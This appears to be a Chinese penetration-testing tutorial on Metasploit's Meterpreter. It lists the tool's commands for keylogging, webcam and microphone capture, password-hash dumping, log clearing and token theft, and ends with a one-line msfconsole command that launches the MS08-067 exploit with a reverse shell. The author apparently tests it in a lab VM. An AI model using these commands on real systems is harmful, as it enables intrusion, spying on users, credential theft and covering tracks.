高级，动态，可扩展的payload

基于meterpreter上下文利用更多漏洞发起攻击，后渗透阶段一站式操作界面

完全基于内存的dll注入式payload（不写硬盘）

注入合法系统进程并建立stager

基于stager上传和预加载dll进行扩展模块的注入（客户端api）

基于stager建立的socket连接建立加密的TLS/1.0通信隧道

利用TLS隧道进一步加载后续扩展模块（避免网络取证）

服务端使用C语言编写

客户端提供基于ruby的全特性api（支持任何语言）

meterpreter>帮助
核心命令
=============

命令描述
    ------- -----------
    ？                                                    帮助菜单
    background                                     回到当前会话
    bg　　　　　　　　　　　　　       别名为背景
    bgkill　　　　　　　　　　　　      杀死背景meterpreter脚本
    bglist　　　　　　　　　　　　      列出运行后台脚本
    bgrun　　　　　　　　　　            在后台执行一个meterpreter脚本
    channel　　　　　　　　　　  　   显示信息或控制活动通道
    close 　　　　　　　　　　　   　  关闭频道
    disable_unicode_encoding              禁用unicode字符串的编码
    enable_unicode_encoding              启用unicode字符串的编码
    exit　　　　　　　　　　　　        终止meterpreter会话
    get_timeouts　　　　　　　　       获取当前会话超时值
    guid　　　　　　　　　　　　　　获取会话GUID
    help　　　　　　　　　　　　　　帮助菜单
    info　　　　　　　　　　　　　　显示有关Post模块的信息
    irb　　　　　　　　　  　　　　　在当前会话中打开交互式Ruby shell
    load　　　　　　　　　　　 　　加载一个或多个meterpreter扩展
    machine_id　　　　　　　　　　获取附加到会话的计算机的MSF ID
    migrate　　　　　　　　　　　　将服务器迁移到另一个进程
    pivot　　　　　　　　　　　 　　管理数据透视侦听器
    pry　　　　　　　　　　　　　　在当前会话中打开Pry调试器
    quit　　　　　　　　　　　　　　终止meterpreter会话
    read　　　　　　　　　　　 　　从通道读取数据
    resource　　　　　　　　　　     运行存储在文件中的命令
    run　　　　　　　　　　　　　　执行meterpreter脚本或Post模块
    sessions　　　　　　　　 　　　快速切换到另一个会话
    set_timeouts　　　 　　　　 　　设置当前会话超时值
    sleep　　　　　　　　　　　　　 强制Meterpreter安静，然后重新建立会话。
    transport　　　　　　　　　　　　更改当前的传输机制
    use　　　　　　　　　　　　　　不推荐使用的别名“load”
    uuid　　　　　　　　　　　　　　获取当前会话的UUID
    write　　　　　　　　　　　　　　将数据写入通道

Stdapi：文件系统命令
============================

命令描述
    ------- -----------
    cat　　　　　　　　　　　　将文件内容读入屏幕
    cd　　　　　　　　　　　　 更改目录
    checksum　　　　　 　　　 检索文件的校验和
    cp　　　　　　　　　　　　将源复制到目标
    dir　　　　　　　　　　　　列表文件（ls的别名）
    download　　 　　　　　 　下载文件或目录
    edit　　　　　　　　　　　　编辑文件
    getlwd　　　　　　　　 　　打印本地工作目录
    getwd　　　　　　　　　 　 打印工作目录
    lcd　　　　　　　　　　　　更改本地工作目录
    lls　　　　　　　　　　　　列出本地文件
    lpwd　　　　　　　　　　　打印本地工作目录
    ls　　　　　　　　　　　　列出文件
    mkdir　　　　　　　　　　 制作目录
    mv　　　　　　　　　　　 将源移动到目标
    pwd　　　　　　　　　　　打印工作目录
    rm　　　　　　　　　　     删除指定的文件
    rmdir　　　　　　　　　　 删除目录
    search　 　　　　　　　　搜索文件
    show_mount　　　　         列出所有挂载点/逻辑驱动器
    upload　　　　　　           上传文件或目录

Stdapi：网络命令
===========================

命令描述
    ------- -----------
    arp　　　　　　　　　　显示主机ARP缓存
    getproxy　　　　　　　 显示当前的代理配置
    ifconfig　　　　　　　　显示接口
    ipconfig　　　　　　　  显示接口
    netstat　　　　　　　　显示网络连接
    portfwd　　　　　　　　将本地端口转发到远程服务
    resolve　　　　　　　　解析目标上的一组主机名
    route　　　　　　　　　　查看和修改路由表

Stdapi：系统命令
=======================

命令描述
    ------- -----------
    clearev　　　　　　　　　　清除事件日志
    drop_token　　　　　　　 　放弃任何活动的模拟令牌。
    execute　　　　　　　　　　执行命令
    getenv　　　　　　               获取一个或多个环境变量值
    getpid　　　　　　                获取当前进程标识符
    getprivs　　　　　　　　      尝试启用当前进程可用的所有权限
    getsid　　　　　　　　　　  获取运行服务器的用户的SID
    getuid　　　　　　　　　　 获取服务器正在运行的用户
    kill　　　　　　　　　　　　终止进程
    localtime　　　　　　　　   显示目标系统的本地日期和时间
    pgrep　　　　　　　　　　 按名称过滤进程
    pkill　　　　　　　　　　    按名称终止进程
    ps　　　　　　　　　　　   列出正在运行的进程
    reboot　　　　　　　　　　重新启动远程计算机
    reg　　　　　　　　　　　 修改远程注册表并与之交互
    rev2self　　　　　　　　　 在远程计算机上调用RevertToSelf（）
    shell　　　　　　　　 　　 进入系统命令shell
    shutdown　　　　　　　　 关闭远程计算机
    steal_token　　　　　　     尝试从目标进程中窃取模拟令牌
    suspend　　　　　　　　  暂停或恢复进程列表

sysinfo 　　　　　　　　　关于远程系统的信息，例如OS

Stdapi：用户界面命令
===============================

命令描述
    ------- -----------
    enumdesktops　　　　　　列出所有可访问的桌面和窗口站
    getdesktop　　　　　　　　获取当前的meterpreter桌面
    idletime　　　　　　　　　返回远程用户空闲的秒数
    keyscan_dump　　　　　　转储击键缓冲区
    keyscan_start　　　　　　开始捕获击键
    keyscan_sto 　　　　　　　停止捕获击键
    screenshot　　　　　　　　获取交互式桌面的屏幕截图
    setdesktop　　　　　　　　更改meterpreters当前桌面
    uictl　　　　　　　　　　　控制一些用户界面组件

Stdapi：网络摄像头命令
=======================

命令描述
    ------- -----------
    record_mic　　　　　　　 从默认麦克风录制音频X秒
    webcam_chat　　　　　　 开始视频聊天
    webcam_list　　　　　　   列出网络摄像头
    webcam_snap　　　　　　从指定的网络摄像头拍摄快照
    webcam_stream　　　　　 播放指定网络摄像头的视频流

Stdapi：音频输出命令
=============================

命令描述
    ------- -----------
    play　　　　　　　　播放在目标系统上播放音频文件，没有写在磁盘上

Priv：提升命令
======================

命令描述
    ------- -----------
    getsystem　　　　　　尝试将您的权限提升为本地系统的权限。

Priv：密码数据库命令
================================

命令描述
    ------- -----------
    hashdump　　　　　　　　转储SAM数据库的内容

Priv：Timestomp命令
========================

命令描述
    ------- -----------
    timestomp　　　　　　　　操作文件MACE属性

查看系统

查看文件及文件夹

列出进程

更改文件名字

在后台运行一个进程

先查看本机文件

然后上传一个文件到目标上

使用vnc

删除所有日志

下载目标的文件

先ps 列出进程 然后migrate 7636 把自己迁移到id号为7636这个进程里面

下载hash

查看挂载了几个硬盘

搜索某个文件

arp缓存

目标操作系统空闲时间

记录麦克风（我虚拟机没有）

列出主机有几个摄像头（我虚拟机没有）

如果有的话就可以打开摄像头

python扩展---无需运行环境，在客户端运行原生python代码

load导入python扩展，写python代码即可

msfconsole -x（编写脚本时便于引用）

msfconsole -x "use exploit/windows/smb/ms08_067_netapi; set RHOST 192.168.1.13;set payload windows/meterpreter/reverse_tcp; set LHOST 192.168.1.12;set LPORT 4444;exploit"

友情链接 http://www.cnblogs.com/klionsec

http://www.cnblogs.com/l0cm

http://www.cnblogs.com/Anonyaptxxx

http://www.feiyusafe.cn